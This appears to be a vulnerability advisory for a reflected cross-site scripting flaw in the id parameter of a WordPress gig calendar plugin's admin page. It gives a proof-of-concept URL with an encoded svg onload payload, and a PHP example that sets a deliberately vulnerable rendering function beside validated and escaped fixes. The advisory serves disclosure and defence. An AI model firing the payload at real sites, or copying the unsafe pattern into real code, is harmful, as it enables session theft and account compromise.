The plugin does not sanitise or escape the id GET parameter before outputting it back in the admin dashboard when editing an Event, leading to a reflected Cross-Site Scripting issue.
https://example.com/wp-admin/admin.php?page=mf_gig_calendar&action=edit&id=%22%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3B%3E%3C%22
iohex
iohex
Yes
2021-08-17 (about 10 months ago)
2021-08-17 (about 10 months ago)
2022-04-09 (about 2 months ago)
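
The fix for the reflected id parameter described above, as an added example in plain PHP. It is not the plugin's source: the hidden form field used as the output sink and the function names are assumptions made for illustration.

```php
<?php
// Added example, not the plugin's code. The sink (a hidden form field) is assumed.
// Input: the id value from the proof-of-concept URL above, URL-decoded.
$payload = urldecode('%22%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3B%3E%3C%22');

// Vulnerable pattern: the raw request value is concatenated into an attribute,
// so a double quote in id closes the attribute and the rest is parsed as markup.
function render_unsafe(array $query): string {
    $id = $query['id'] ?? '';
    return '<input type="hidden" name="id" value="' . $id . '">';
}

// Hardened pattern: an event id is a positive integer, so validate it as one
// and reject anything else, then escape on output as a second layer.
// In WordPress code the usual helpers are absint() and esc_attr().
function render_safe(array $query): string {
    $id = filter_var(
        $query['id'] ?? '',
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($id === false) {
        return '<p>Invalid event id.</p>';
    }
    $escaped = htmlspecialchars((string) $id, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="id" value="' . $escaped . '">';
}

// Escaping alone, for values that cannot be validated as integers:
// quotes and angle brackets become entities and stay inside the attribute.
function render_escaped(array $query): string {
    $id = htmlspecialchars((string) ($query['id'] ?? ''), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="id" value="' . $id . '">';
}

foreach ([$payload, '42'] as $value) {
    $query = ['id' => $value];
    echo 'id      = ' . $value . PHP_EOL;
    echo 'unsafe  : ' . render_unsafe($query) . PHP_EOL;
    echo 'escaped : ' . render_escaped($query) . PHP_EOL;
    echo 'safe    : ' . render_safe($query) . PHP_EOL . PHP_EOL;
}
```

Run with the PHP CLI to compare the three outputs for the proof-of-concept value and for a normal id of 42.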